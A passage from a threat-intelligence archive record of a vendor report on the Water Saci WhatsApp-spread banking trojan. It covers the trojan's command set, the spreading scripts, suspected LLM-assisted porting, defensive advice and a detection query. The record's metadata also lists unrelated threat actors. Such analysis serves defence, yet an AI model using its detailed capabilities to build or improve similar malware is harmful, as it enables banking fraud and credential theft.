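    print(classify_checkin(CONTROL_REQUEST))
```

The decoded antivirus field is the one to read first in an incident: it is the implant's own view of what protection it found, taken from the WMI AntiVirusProduct query described earlier, and tells you whether the operator expected to be seen.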
Table 5 summarizes most of the commands along with their descriptions, providing insight into the full range of actions this banking trojan can execute on a victim's machine. Each line gives the command marker and its purpose, grouped by category.\r\nConnection commands:\r\n\u003c|SocketMain|\u003e - Main socket communication handler\r\n\u003c|OK |\u003e - Send system information (\u003c|Info|\u003e) to the C\u0026C server\r\n\u003c|PING|\u003e / \u003c|PONG|\u003e - Network connectivity test\r\n\u003c|Close|\u003e - Close all active connections\r\nAuthentication and security:\r\n\u003c|NOSenha|\u003e - Display password error message\r\nRemote desktop and screen control:\r\n\u003c|REQUESTKEYBOARD|\u003e - Enable keyboard capture\r\n\u003c|first|\u003e - Initialize screen sharing session\r\n\u003c|AtivarImagem|\u003e - Start screen capturing\r\n\u003c|DesativarImagem|\u003e - Stop screen capturing\r\n\u003c|AlterarResolucao|\u003e - Modify screen resolution\r\nCommunication features:\r\n\u003c|OpenChat|\u003e, \u003c|Chat|\u003e, \u003c|CloseChat|\u003e - Chat functionality\r\nMouse control commands:\r\n\u003c|MousePos|\u003e, \u003c|MouseLD|\u003e, \u003c|MouseLD_Volta|\u003e, \u003c|MouseLU|\u003e, \u003c|MouseLU_Volta|\u003e, \u003c|MouseRD|\u003e, \u003c|MouseRD_Volta|\u003e, \u003c|MouseRU|\u003e, \u003c|MouseRU_Volta|\u003e, \u003c|MouseMD|\u003e, \u003c|MouseMD_Volta|\u003e, \u003c|MouseMU|\u003e, \u003c|MouseMU_Volta|\u003e - Mouse movement and click simulation (LD/LU: left button down/up; RD/RU: right button down/up; MD/MU: middle button down/up)\r\n\u003c|MouseWheelUp|\u003e, \u003c|MouseWheelUp_Volta|\u003e, \u003c|MouseWheelDown|\u003e, \u003c|MouseWheelDown_Volta|\u003e - Mouse wheel scrolling\r\n\u003c|MOUSESENDINPUT|\u003e, \u003c|MOUSESENDNORMAL|\u003e - Toggle mouse input method\r\n\u003c|LULUZSD|\u003e\r\nFile system operations:\r\n\u003c|Folder|\u003e - List directories\r\n\u003c|Files|\u003e - List files in a directory\r\n\u003c|DownloadFile|\u003e - Download a file from the victim to the C\u0026C server\r\n\u003c|UploadFile|\u003e - Upload a file from the C\u0026C server to the victim\r\nSystem control:\r\n\u003c|RESTART|\u003e - Force restart of the machine\r\n\u003c|CMD|\u003e - Execute a remote command using cmd.exe\r\n\u003c|MONKEY|\u003e - Random input simulation\r\nWindow management:\r\n\u003c|LIST_WINDOWS|\u003e - Enumerate all windows\r\n\u003c|LISTMIN_WINDOWS|\u003e - Minimize windows\r\n\u003c|LISTKILL_WINDOWS|\u003e - Kill specific windows\r\nMonitoring and evasion:\r\n\u003c|MOVISIBLE|\u003e, \u003c|MOINVISIBLE|\u003e - Control mouse cursor visibility\r\n\u003c|BLOQUEARMOUSE|\u003e, \u003c|RESTAURARMOUSE|\u003e - Block/restore mouse functionality\r\n\u003czzz|DELETEDKL|\u003e - Delete keylogger data\r\n\u003c|MENSAGEM|\u003e - Display custom message\r\nSystem information:\r\n\u003c|GETINFO|\u003e / \u003c|LIST_INFO|\u003e - Gather system information\r\n\u003c|Metodo|\u003e - Set operational method/mode\r\n\u003c|Reconected|\u003e - Handle reconnection\r\nScreen capture control:\r\n\u003c|GETPRINTHANLE|\u003e, \u003c|GETPRINTMAGNIFIER|\u003e, \u003c|GETPRINTDESKTOP|\u003e, \u003c|GETPRINTAPP|\u003e - Screen capture for different contexts\r\nBanking/financial malware features:\r\n\u003c|CE_ASSI|\u003e, \u003c|CE_TRANS|\u003e, \u003c|CB_SEN|\u003e, \u003c|CB_UPDATE|\u003e - Create fake banking interfaces and capture credentials and transaction data, specifically targeting Brazilian banking systems\r\n\u003c|PedidoSenhas|\u003e - Request passwords\r\n\u003c|SendSenha|\u003e - Send passwords\r\n\u003c|HOLE|\u003e, \u003c|HOLENOFF|\u003e - Screen overlay management\r\nTable 5. Backdoor commands granting the operator near-complete remote control over an infected system\r\nPropagation automation - whatsz.py\r\nOur analysis revealed that tadeu.ps1, discussed in our previous blog entry, and whatsz.py (Figure 22) are functionally equivalent WhatsApp automation components. The Python sample appears to be an enhanced port of the PowerShell version, maintaining the same workflow, logic, and intent. The use of Python in this stage lets the attackers automate propagation, streamline payload delivery, and improve the flexibility and resilience of their operations.\r\nFigure 22. Component files downloaded by instalar.bat and used by whatsz.py\r\nWhen instalar.bat was executed, it downloaded component files including Python 3.12.7, get-pip.py, and the chromedriver.exe needed by the Python script to function and carry out its propagation routine (Figure 23). Both the PowerShell (tadeu.ps1) and Python (whatsz.py) scripts do essentially the same things: they automate WhatsApp Web via Selenium, inject the WA-JS library, grab contact lists, send files automatically (using Base64 encoding), load remote configurations, pause and resume tasks, and report progress back to a C\u0026C server.\r\nFigure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One\r\nTable 6 compares the previous PowerShell-based propagation routine with the newly observed Python variant, highlighting their shared automation features.\r\nFeature - PowerShell (tadeu.ps1) - Python (whatsz.py) - Match?\r\nWhatsApp automation via Selenium - ✓ - ✓ - YES\r\nWA-JS library injection - ✓ - ✓ - YES\r\nMass contact extraction - ✓ - ✓ - YES\r\nAutomated file sending - ✓ - ✓ - YES\r\nBase64 file encoding - ✓ - ✓ - YES\r\nRemote configuration loading - ✓ - ✓ - YES\r\nPause/resume system - ✓ - ✓ - YES\r\nProgress reporting to C\u0026C - ✓ - ✓ - YES\r\nContact list exfiltration - ✓ - ✓ - YES\r\nTable 6. Comparison of features between the PowerShell-based propagation routine and the Python variant\r\nGiven the similarity of logic, the injected JavaScript, and the explicit description included in the Python code itself, “WhatsApp Automation Script – Versao Python Convertido de PowerShell para Python Suporte para Chrome, Edge e Firefox” (WhatsApp Automation Script: Python version, converted from PowerShell to Python, support for Chrome, Edge and Firefox; Figure 24), there is compelling circumstantial evidence that an automated aid, such as a large language model (LLM) or code-translation tool, may have been used to accelerate the porting process. LLMs have proven capabilities for translating and refactoring code across languages and are commonly used for tasks like legacy migration and cross-language translation. While this observation does not definitively prove that an LLM was involved, it strongly supports the plausibility that one sped up the conversion.\r\nFigure 24. Python script header explicitly stating it was converted from PowerShell\r\nFigures 25 and 26 display additional sections of the script that suggest the use of an LLM to expedite the conversion. The snippets further illustrate potential interactions with AI, where requests for enhancements are made. 
\r\nFigure 25. The text: ”send message to a contact – version optimized with errors handling”\r\nFigure 26. The text: ” Send message to multiple contacts at same time – super fast!”\r\nNotably, the script includes optimized messaging functions and a main automation class with comprehensive\r\nformatting for different statuses (Figure 27).\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 25 of 29\n\nFigure 27. Main automation class with formatting definitions for different statuses\r\nThe script produces highly interesting and colorful output, including the use of emojis in console outputs, while\r\nrunning in the background (Figure 28). This is atypical for manually written automation scripts and may indicate\r\nAI-generated code designed for enhanced user experience.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 26 of 29\n\nFigure 28. Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.\r\nDespite the logic similarity, improvements were made that materially increase the Python variant’s reach,\r\nreliability, and operational flexibility; this suggests that the port isn’t just a straight translation but an upgrade. The\r\nPython build shifts to a more portable runtime, separates concerns into clearer classes, adds richer error handling\r\nand batch-sending capabilities, and broadens browser support (Table 7). Together, these changes make\r\npropagation faster, more resilient to failure, and easier to maintain or extend. 
\r\nAspect | PowerShell | Python | Significance\r\nLanguage | PowerShell | Python 3 | Port/translation\r\nBrowser support | Chrome only | Chrome/Edge/Firefox | Enhanced capability and wider reach\r\nCode organization | Functions | Object-oriented (class) | Better structure\r\nError handling | Basic try-catch | Enhanced with specific handlers | More robust\r\nBatch sending | Individual only | Individual + batch mode | Faster spreading\r\nHeadless mode | Supported | Supported (enhanced) | Stealth operation\r\nContact filtering | Basic | Enhanced (@lid filtering) | Better targeting\r\nTable 7. Improvements to the Python variant compared to the PowerShell variant\r\nConclusion\r\nThe Water Saci campaign exemplifies a new era of cyber threats in Brazil, where attackers exploit the trust and reach of popular messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware campaigns. By weaponizing familiar communication channels and employing advanced social engineering, threat actors are able to swiftly compromise victims, bypass traditional defenses, and sustain persistent banking trojan infections. This campaign demonstrates how legitimate platforms can be transformed into powerful vectors for malware delivery and underscores the growing sophistication of cybercriminal operations in the region.\r\nThe campaign’s multi-stage infection chain, spanning malicious HTA files, MSI installers, and advanced Python-based automation, underscores the increasing complexity of today’s threats. Notably, the integration of propagation automation via WhatsApp, anti-analysis measures, and robust persistence mechanisms enables attackers to maximize reach while evading detection and maintaining long-term access to compromised systems.\r\nThis analysis highlights the urgent need for organizations and individuals to adopt a multi-layered security approach. 
Proactive measures such as disabling auto-downloads in messaging applications, restricting file transfers, enhancing user awareness, and deploying advanced endpoint security solutions are crucial in defending against sophisticated, script-based threats like Water Saci.\r\nAs attackers continue to innovate, leveraging both technical and social vectors, it is imperative to combine robust technology with continuous education and vigilant security practices. Trend Micro remains committed to monitoring these evolving threats, providing actionable intelligence, and empowering organizations to stay ahead of the adversaries.\r\nDefense recommendations\r\nTo minimize the risks associated with the Water Saci campaign, Trend recommends several practical initial defense items:\r\nDisable auto-downloads on WhatsApp. Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.\r\nControl file transfers on personal apps. Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.\r\nEnhance user awareness. The victimology of the Water Saci campaign suggests that attackers are targeting enterprises. Regular security training helps an organization’s employees recognize the dangers of downloading files via messaging platforms. Advise users to avoid opening unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.\r\nEnhance email and communication security controls. 
Restrict access to personal email and messaging apps on corporate devices. Use web and email gateways with URL filtering to block known malicious C\u0026C and phishing domains.\r\nEnforce multi-factor authentication (MFA) and session hygiene. Require MFA for all cloud and web services so that stolen credentials alone are not enough for account takeover. MFA does not protect a session that is already authenticated; that is what session hygiene addresses. Advise users to log out after using messaging apps and regularly clear browser cookies and tokens.\r\nDeploy advanced endpoint security solutions. Use Trend’s endpoint security platforms (such as Trend Micro Apex One™ or Vision One) to detect and block suspicious script-based attacks, fileless malware, and automation abuse. Enable behavioral monitoring to catch unauthorized VBS, PowerShell, and Python script execution, browser profile alterations, and lateral movement attempts related to WhatsApp and similar threats.\r\nImplementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications.\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\r\nDetect process creation events where a randomly named .exe executes a randomly named .log file.\r\neventSubId:2 AND processCmd:/[A-Za-z0-9]{6,}\\.exe [A-Za-z0-9]{6,}\\.log/\r\nNote that the pattern tests only length and character set, not randomness, so legitimate tools invoked with a .log argument can match; review hits and add path or process exclusions before promoting it to an alert.\r\nIndicators of Compromise (IoCs)\r\nThe indicators of compromise for this entry can be found here.\r\nFigure 15. Create suspended process and allocate memory\r\nFigure 16. Alternate fallback base addresses\r\nSource: https://www.trendmicro.com/en_us/research/25/l/water-saci.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/l/water-saci.html"
	],
	"report_names": [
		"water-saci.html"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d11b4ce0-97fd-4f61-8186-40e8c390d5d3",
			"created_at": "2026-01-18T02:00:03.069539Z",
			"updated_at": "2026-04-10T02:00:03.908186Z",
			"deleted_at": null,
			"main_name": "Water Saci",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Saci",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434402,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.pdf",
		"text": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.txt",
		"img": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.jpg"
	}
}